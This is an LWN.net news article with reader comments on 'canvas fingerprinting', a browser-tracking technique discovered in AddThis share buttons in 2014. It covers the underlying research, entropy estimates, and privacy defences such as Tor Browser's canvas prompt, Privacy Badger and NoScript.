User: Password:
|
|
Subscribe / Log in / New account

Browser tracking through "canvas fingerprinting"

Did you know...?

LWN.net is a subscriber-supported publication; we rely on subscribers to keep the entire operation going. Please help out by buying a subscription and keeping LWN on the net.

By Nathan Willis
July 23, 2014

Recently, public attention has been called to a new online user-tracking method that is purported to be nearly impossible to block. Called "canvas fingerprinting," the technique relies on forcing the browser to generate an image on the client side of the connection—an image that is unique enough to serve as a fingerprint for the browser that created it. In fact, the basis for this fingerprinting approach is several years old, but it does now seem to be in use in the wild. Whether or not it truly amounts to an insurmountable blocking challenge, however, remains to be seen.

ProPublica was among the first to report the discovery of the technique, in an article dated July 21. The tracker was discovered running on multiple high-traffic web sites, and was served by the web-tracking vendor AddThis. AddThis's user-visible feature is the appearance of click-and-share-this-link buttons that connect to various social-media services; the web-tracking function that accompanies said buttons is not advertised, of course.

The new tracker uses the HTML5 <canvas> element, telling the user's browser to draw a hidden image containing the text "Cwm fjordbank glyphs vext quiz"—which is a pangram in English, containing every letter of the alphabet. The text is rendered in the <canvas> element multiple times, in different colors and overlapping—and differences in the graphics stacks of different computers will produce slightly different results. That, plus the variations in browser-window size, text-rendering settings, and other variables, mean that the resulting image, when rasterized, will exhibit a considerable amount of variation from one browser to the next. It can thus be sent back to the originating server (via the ToDataUrl method) to serve as a fingerprint to track the browser between different sites and repeat visits.

Inquisitive users can visit the browserleaks.com page that tests <canvas> support to tell whether or not they are susceptible to this form of fingerprinting.

Although the AddThis fingerprinting tracker appears to be the first of its kind, the concept of canvas fingerprinting is not new. It was first described in detail in a 2012 paper written by Keaton Mowery and Hovav Shacham. The paper describes tests performed both with text rendering and by creating an image with WebGL. It goes into considerable detail about what parts of the browser and graphics stack contribute to differences in the resulting rendered image.

On the OpenGL side, the authors noted differences in the antialiasing algorithm, the interpolation of textures, and the illumination calculated for the OpenGL light source that is pointed at the image. In the text component, even though all text elements were rendered in the Arial font, there were discernible differences between the version of Arial used, the sub-pixel hinting, spacing, and antialiasing.

Ultimately, Mowery and Shacham estimated that their tests revealed an entropy of 5.73 bits, but noted that the tests were not sophisticated and that further refinement could yield better results. This is not an insignificant amount of entropy, but it is worth putting in context. The Panopticlick project from the Electronic Frontier Foundation (EFF) notes that the average browser fingerprint it observes contains 18.1 bits of entropy or more, which is enough to uniquely identify one browser out of roughly 280,000. An additional 5.73 bits pushes that number to one in 14.6 million.

Thus, even the relatively modest entropy accounted for in Mowery and Shacham's research can constitute a real threat to individual privacy when it is used in conjunction with other techniques. But the AddThis canvas fingerprinting technique may have improved on the 2012 research in other ways. ProPublica attributed the discovery of the new AddThis tracker to a team of researchers at KU Leuven University in Belgium and Princeton University in the United States. The team's findings have been published on the web, but the code and data have not yet been released—although the researchers have said it will be made public shortly.

On the other hand, assessing the real-world implications of this new flavor of web tracker requires determining how difficult it is to defeat. ProPublica titled its article on the find "Meet the Online Tracking Device That is Virtually Impossible to Block," but that would appear to overstate matters. Tor implemented a canvas-fingerprinting blocker in the Tor Browser Bundle in 2012. The EFF told MediaPost that its recent update to the Privacy Badger extension will block the AddThis tracker along with other social-media-based trackers. And commenters on many web articles about the find have also reported that the tracker can be defeated by the usual options like NoScript or by disabling JavaScript entirely.

The ProPublica article does mention tracker-blocking options in a sidebar, although it labels them with discouraging warnings like "can be slow" and "requires a lot of research and decision-making." Users who are attuned to the risks of browser-tracking and the steps necessary to combat it may find such commentary objectionable. But then again, it is the "average user" who makes up the bulk of the population that AddThis and other web-tracking companies will be collecting data from. Reality is, unfortunately, that a great many users cannot or will not take steps to improve their privacy beyond whatever ships by default in the browser. Even if canvas fingerprinting fails to catch on, the contest to capture those user's movements through the web will undoubtedly just move on to the next user-tracking idea.


(Log in to post comments)

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 18:57 UTC (Wed) by smoogen (subscriber, #97) [Link]

And as long as the majority of people do not protect their privacy, those that do remove data end up showing up as their own fingerprint because what they remove can be just as trackable.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 23:04 UTC (Wed) by dashesy (guest, #74652) [Link]

Fortunately the majority of people use more and more generic and mass-produced machines, if all Chromebooks (of the same model) generate same fingerprint sure it won't be of any value.

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 20:44 UTC (Tue) by Lennie (guest, #49641) [Link]

Yes, that was my idea as well.

Until I started thinking about it and later found this article too:
https://wiki.mozilla.org/Fingerprinting

Lot's of fun things on that list, like:

- Clock skew measurements
- TCP stack (think: nmap)
- Scout Analytics provides software to fingerprint users based on typing cadence

I believe there are some 14 different Chromebook models now ? Or even more.

So that is already pretty big number. If you want to create a profile per user, you have to collect as much data about the browser/machine/user and try to combine different browsing sessions that look like they are probably the same.

Now start with something simple. Users at their home not using Tor and not with a browser-extension installed to block Javascript. Take that 14 different Chromebook models and let's combine that IP-address or IP-address block from the ISP. Even a dynamic IP-address is probably per region.

Pretty much everyone has 24/7 his/her cable/DSL connected to the Internet, right ? So how often do you think your IP-address changes ? Somewhere between: maybe ones every few weeks, more likely ones every few months.

Both the GPU and IP-address usually doesn't change at the same time.

How many people use the same or very similar GPU in your direct region ?

Do you still think only based on these items you are not able to combine some number of browsing sessions ?

And this is only a 2 variables of which there are many, have an other look at the link above from Mozilla.

But that list is even complete, they can combine that with:
- website visited (many people have sites they regularly visit)

- search query when 'referer' is a search engine, people search for the same things when visiting different websites (not as common anymore, because more search engines use HTTPS which means no more referer information available)

I'm sure there are many more.

Browser tracking through "canvas fingerprinting"

Posted Jul 30, 2014 21:17 UTC (Wed) by dashesy (guest, #74652) [Link]

I think you are right. Another vector I did not see in that link is that most users have more than one machine, it is enough to identify the connection once, afterwards they can track you even after you change one machine. And even if you install all sort of plugins on your PC, you may have a harder time (or less inclination to do likewise) on default browser of cellphones.

Browser tracking through "canvas fingerprinting"

Posted Jul 30, 2014 22:00 UTC (Wed) by Lennie (guest, #49641) [Link]

I'm a Firefox user, with Firefox Sync (which encrypts everything before uploading). I know it uploads: bookmarks, history and saved passwords and current open windows/tabs information. No cookies or local storage.

But does anyone know what Chrome does ? Does it sync cookies ? If so, that would make it a lot easier to track people.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 19:02 UTC (Wed) by mathstuf (subscriber, #69389) [Link]

How much do things like RequestPolicy help with this since no site is allowed to force me to connect to another without permission? I guess having them proxy it back through the original site's server would fix it, but then that means changing ad networks requires changing your web server's configuration.

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 19:52 UTC (Tue) by Lennie (guest, #49641) [Link]

This solves it.

The tracking you should be the most "afraid" of, is the cross-site kind which usually all use other domains.

So yes, something like RequestPolicy solves it.

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 21:20 UTC (Tue) by mathstuf (subscriber, #69389) [Link]

That's good. I think the only things I'm missing from RequestPolicy are wildcard whitelisting (e.g., sites using cdnX.foobar.com) and auditing (a Lightbeam-like interface for what *would* have happened without it (AFAitCT at least; deep links would be lost, understandably).

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 19:08 UTC (Wed) by MegabytePhreak (guest, #60945) [Link]

It's not clear to me that the data that this technique generates is really orthogonal to the data that panopticlick collects. If the majority of the 5.73 bits (or however many are actually extractable) identify the browser and the OS, then that doesn't really add anything to the total fingerprint information content, since panopticlick can get that from the user agent.

From what I can tell, the biggest fingerprinting information leak seems to be the installed system font and the list of installed plugins. Now that we have WebFonts maybe browsers should only expose a limited fixed subset of system fonts. Of course this information is also leaked by flash and java as well.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:03 UTC (Wed) by jimparis (subscriber, #38647) [Link]

> From what I can tell, the biggest fingerprinting information leak seems to be the installed system font and the list of installed plugins. Now that we have WebFonts maybe browsers should only expose a limited fixed subset of system fonts.

See the linked 2012 paper. They differ even in how browsers render identical WebFonts. But the biggest fingerprinting information leak, based on the entropies estimated in that paper, was WebGL rendering (presumably since it's affected by browser, operating system, drivers, chipset, etc).

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:29 UTC (Wed) by MegabytePhreak (guest, #60945) [Link]

I guess my point of view is that being able to identify the browser and OS isn't necessarily something that can be prevented, but being able to identify an individual user (as the set of installed fonts+plugins is apparently often able to do according to the panopticlick data) is a problem.

As far as WebGL goes, that's a whole nother kettle of fish that I don't really have a solution for (other than being able to turn it off).

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 6:10 UTC (Thu) by epa (subscriber, #39769) [Link]

It would help for rendering to a canvas (rather than directly to the screen) to be done in software. Many of the small rendering differences are due to hardware acceleration.

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 12:36 UTC (Thu) by roc (subscriber, #30627) [Link]

Unfortunately, "don't use the GPU" is not viable for many applications (games).

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 15:31 UTC (Thu) by rahvin (subscriber, #16953) [Link]

Isn't the fix for this to allow the browser to notify the user, or for the user to ban the transfer of data back to the server? It would seem to me it's the datatourl tag that appears to be causing the problem and has been one of the major problems with the interactive web.

First they added scripting that allowed remote servers to run executable scripts on the users PC, now with these extensions they are allowing those scripts to send generated data back to the server. That's scary and should be completely user controllable if not outright disabled. I want to know every single time, and be able to reject the request, when a server requests data from my computer, particularly data it had my computer create.

That this feature to send data to the server from the local computer even exists presents all kind of security vulnerabilities. I realize I don't know every possible use of this feature and there could be some compelling use case, but the security risks far outweigh the benefits. Combined with a root exploit and a browser exploit you could use this to send back any data to the server in a way that most IDS's or packet inspection systems would miss because it looks like standard web traffic.

Maybe I'm just paranoid but after installing things like Ghostery, Request Policy and NoScript you come to realize just how much information is being shared by web sites to these blackhole data collection services with little to no privacy policy and an incentive to collect every single detail of your life in a database.

I'd like to encourage Firefox to either create an extension or put an option in to approve data transfers or disable that tag.

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 19:24 UTC (Thu) by mathstuf (subscriber, #69389) [Link]

Could you monkey patch[1] dataToUrl to pop up an alert() and return an empty string on denial? Even better if you can save a "userAuthorized" per caller. The problem is that it has uses other than this and the function definitely doesn't have the knowledge of what is done with the return value :( .

[1]I like Python's term "duck punching" for this. Is there a special term for JS? "Pollock coding" seems apt?

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 20:29 UTC (Thu) by jimparis (subscriber, #38647) [Link]

Don't know about monkey patching it, but the Tor browser project uses a Firefox patch that requires user confirmation before Javascript can extract data from a canvas element: https://trac.torproject.org/projects/tor/ticket/6253

Browser tracking through "canvas fingerprinting"

Posted Aug 3, 2014 4:31 UTC (Sun) by chax (guest, #52122) [Link]

It is certainly possible to do some sort of “monkey-patching” thru some userscript, unless a person operating a website knows that you may do it.

Monkey-patching on core functions can be easily overriden by using a delete statement. Consult the following fragment:

> HTMLDocument.prototype.getElementById
< function getElementById() { [native code] }
> HTMLDocument.prototype.getElementById = null
< null
> HTMLDocument.prototype.getElementById
< null
> delete HTMLDocument.prototype.getElementById
< true
> HTMLDocument.prototype.getElementById
< function getElementById() { [native code] }

Browser tracking through "canvas fingerprinting"

Posted Jul 25, 2014 7:13 UTC (Fri) by roc (subscriber, #30627) [Link]

In reality most users have no ability to make these kinds of decisions. Even people who have the ability quickly develop habits of clicking through such warnings. So user notification and confirmation is not a realistic solution for the mass market (and the mass market is what we care about, since they need protection as much as anyone).

Blocking Web page scripts from communicating with servers is nigh impossible. For example you'd have to disable subresource loads, e.g. scripted image loads.

Disabling fetching of canvas pixels blocks all kinds of use-cases, e.g. image editors.

These are hard problems.

Browser tracking through "canvas fingerprinting"

Posted Jul 25, 2014 7:18 UTC (Fri) by dlang (subscriber, #313) [Link]

block the browser from uploading this canvas and the next step will be to put the analysis of what the fingerprint is in the javascript to run on the browser, then the javascript can download image fingerprint0x01.jpg etc

you can't prevent the browser from communicating with the server by fetching things or you break the purpose of the browser.

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 20:02 UTC (Tue) by Lennie (guest, #49641) [Link]

The better solution is to do software rending to Canvas/WebGL by default and have a browser API the Javascript code can use to ask the user for speedy rendering. Which would then be used when playing games, online image editing/whatever.

Just like with the Geolocation API 'Would you to share your location with domainname ?'

What the text of that message should be I'm not going to speculate for now. :-)

Browser tracking through "canvas fingerprinting"

Posted Jul 31, 2014 11:17 UTC (Thu) by oldtomas (guest, #72579) [Link]

> Isn't the fix for this to allow the browser to notify the user, or for the user to ban the transfer of data back to the server? It would seem to me it's the datatourl tag that appears to be causing the problem and has been one of the major problems with the interactive web.

Unfortunately no. It's possible for the browser to send data by issuing a plain old GET request. The URL (and the request headers!) provide ample space for that.

The horse left the barn long time ago, by allowing (and nowadays nigh forcing) the user agent to execute $RANDOM_CODE off the 'net. Except for the very stubborn.

Browser tracking through "canvas fingerprinting"

Posted Jul 28, 2014 16:44 UTC (Mon) by epa (subscriber, #39769) [Link]

Right, but most games will render directly to the screen, surely? Not to a canvas object which is kept off-screen and only queried from Javascript. So when you create a canvas you should choose (a) an accelerated one, which is fast but you can't later query its contents, or (b) the software-rendered one, which will be pixel-for-pixel the same on all browsers, and can be queried from Javascript, but is slower.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:05 UTC (Wed) by rgmoore (✭ supporter ✭, #75) [Link]

It's not clear to me that the data that this technique generates is really orthogonal to the data that panopticlick collects.

This is exactly what I thought when reading that. It's a new way of getting the browser to leak information but not a new set of information being leaked.

Tracking? More like snooping!

Posted Jul 23, 2014 20:23 UTC (Wed) by proski (subscriber, #104) [Link]

Browser sending data from my screen? That's creepy! How would anyone use it for legitimate purposes? OK, maybe it's used to implement an online graphic editor. But then the browser should ask for permission to send my canvas to the server.

Tracking? More like snooping!

Posted Jul 23, 2014 20:55 UTC (Wed) by lambda (subscriber, #40735) [Link]

That's exactly the solution that the Tor browser went with for blocking this attack; prompting you before allowing JavaScript to extract any data from canvas.

Tracking? More like snooping!

Posted Jul 24, 2014 2:44 UTC (Thu) by josh (subscriber, #17465) [Link]

<canvas> has numerous uses, and the ability to turn a <canvas> into an image does as well. For instance, consider a shared sketchboard, or a web-based image editor.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:31 UTC (Wed) by alkbyby (subscriber, #61687) [Link]

I think that merely adding fingerprinting bits is likely incorrect. Most likely there's very strong correlation between panopticlick fingerprints and canvas fingerprints. I won't be surprised if combining those fingerprints doesn't grow entropy at all.

Using several browsers. +1 for diversity

Posted Jul 24, 2014 12:56 UTC (Thu) by ber (subscriber, #2142) [Link]

A simple protection measure is to use several Free Software-Browsers for daily tasks. Its effect is very small of course, but it can be done by everyone without hassle.

Using several browsers. +1 for diversity

Posted Jul 24, 2014 14:32 UTC (Thu) by mpr22 (subscriber, #60784) [Link]

Under my scheme of classification, using more than one web browser falls into the category "hassle" in much the same way that using more than one text editor, using more than one mail client, or using more than one command-line interpreter would.

Using several browsers. +1 for diversity

Posted Jul 25, 2014 20:18 UTC (Fri) by Jandar (subscriber, #85683) [Link]

Instead of changing the whole browser one could change some of the data used for fingerprinting.

On every browser-start drop randomly a few fonts or plugins or whatever. Only those unused for x days and not pinned by the user.

Introduce a fudge-factors into the graphic-primitives to create a kind of changing rounding-errors, invisible to normal human eyes but deflecting this canvas-fingerprinting.

Every time some data is used as variable between users and constant in time, create a slight variance per browser-invocation. There could be a kind of plugin-architecture to random patch the various data-sets.

Using several browsers. +1 for diversity

Posted Jul 26, 2014 6:57 UTC (Sat) by alankila (guest, #47141) [Link]

All of these are horrible solutions.

- dropping plugins does nothing to stop fingerprinting because plugins are not needed for this hack, and if you allow any font to be pinned, then there will exist a pinned font that can be used for the fingerprinting purpose. (Remember, discovering which font is pinned is alone fingerprinting information.) In addition, there exist fonts no sane person will disable. For instance, renderings of Arial are sufficient to perform the fingerprinting and it is an extremely common font in wide use.

- random errors fall prey to simple analysis methods such as averaging or taking median between multiple sample images. Systematic errors that vary slowly in time, however, could work. The fingerprinting used an optics test image with geometric distortion, which produces all sorts of interesting moire which depends on the antialiasing implementation. I suppose it would be possible to perturb the vertex coordinates slightly to change the moire pattern enough to prevent fingerprinting, but I bet this would be user visible as the differences between implementations did not look very subtle to me.

I like dithering personally and every time I do some graphics program that renders some floating-point-valued image with more than 8 bits of precision per component, I convert to sRGB in floating point and then truncate to 8 bits with triangular dither. This type of dither generates uniform noise across the entire image, and of course it could be averaged out one way or other. However, any random noise thwarts efficient fingerprinting mechanisms that just take a single image, then hash it to a short string and send it to server as fingerprint...

Using several browsers. +1 for diversity

Posted Jul 26, 2014 9:27 UTC (Sat) by Jandar (subscriber, #85683) [Link]

> dropping plugins does nothing to stop fingerprinting because plugins are not needed for this hack,

The list of installed plugins is a major part of panopticlicks fingerprinting.

> and if you allow any font to be pinned, then there will exist a pinned font that can be used for the fingerprinting purpose. (Remember, discovering which font is pinned is alone fingerprinting information.)

It's obvious his pinning has to be unobservable for the web-server. After the startup of the browser there is no information left about the fudging of configuration.

> In addition, there exist fonts no sane person will disable.

If everyone has this font, it can't be used for fingerprinting. So what.

> For instance, renderings of Arial are sufficient to perform the fingerprinting and it is an extremely common font in wide use.

To counter this my suggestion was to introduce very small subtle errors into the graphic primitives, which changes with every browser-invocation.

> - random errors fall prey to simple analysis methods such as averaging or taking median between multiple sample images.

To perform averaging over many browser-invocations, they have to identify the user beforehand. If they have other means to identify the user, this whole fingerprinting is unnecessary for them.

None of the random changes are done during a browser session, all must be made on startup

Using several browsers. +1 for diversity

Posted Jul 27, 2014 15:26 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

> None of the random changes are done during a browser session, all must be made on startup

Seeing as browsers these days have the same lifetime as a computer's uptime, is this enough? Maybe once a day or week instead?

Using several browsers. +1 for diversity

Posted Jul 27, 2014 21:20 UTC (Sun) by Jandar (subscriber, #85683) [Link]

If fingerprinting is done within an open tab, it could be repeated and the new fingerprint would be linked to the old one.

If someone is privacy-minded a restart of the browser isn't to much to ask. The new invocation could retain the same URI's in tabs as the previous (can a tab get information about other tabs?).

Using several browsers. +1 for diversity

Posted Jul 27, 2014 22:46 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

> If someone is privacy-minded a restart of the browser isn't to much to ask.

What would you recommend for a typical session length then? Why not just reset it on that schedule (jittered around so that the schedule itself isn't a fingerprint) automatically?

> can a tab get information about other tabs?

Sounds like a bug in the browser (information leak).

Using several browsers. +1 for diversity

Posted Jul 28, 2014 0:02 UTC (Mon) by Jandar (subscriber, #85683) [Link]

> What would you recommend for a typical session length then? Why not just reset it on that schedule (jittered around so that the schedule itself isn't a fingerprint) automatically?

No changing of anything in any running tab if the tabs share the random parameters. Even if the tabs have different parameters re-randomize within a tab is a bad idea, because averaging or building of a common super-/subset would be possible. Probably it's beneficial to use the same randomizing for any tab/window opened from another, because they are linked e.g. thru referer.

The simplest and surest thing would be to randomize on any browser start. More convenient for long living sessions would be separate randomizing in different tabs, but this is probably many orders more difficult. An infrastructure to use different views on central information for the tabs can't be easy ;-).

If I had to do it for myself, I would create a container/vm from a snapshot and change the filesystem before browser-start. Using a few versions of several libraries, multiple versions of fonts (perhaps different compiled version of rendering libraries are sufficient), deletion of fonts/plugins/... (especially installed to get rid of them), tweaking of browser-id and so on. I have no skill or experience with browser-programming so this would be my fill-in.

If someone from the folks programming on firefox would do FCM (Fingerprint Counter Measure), they could do it vastly better.


Copyright © 2014, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds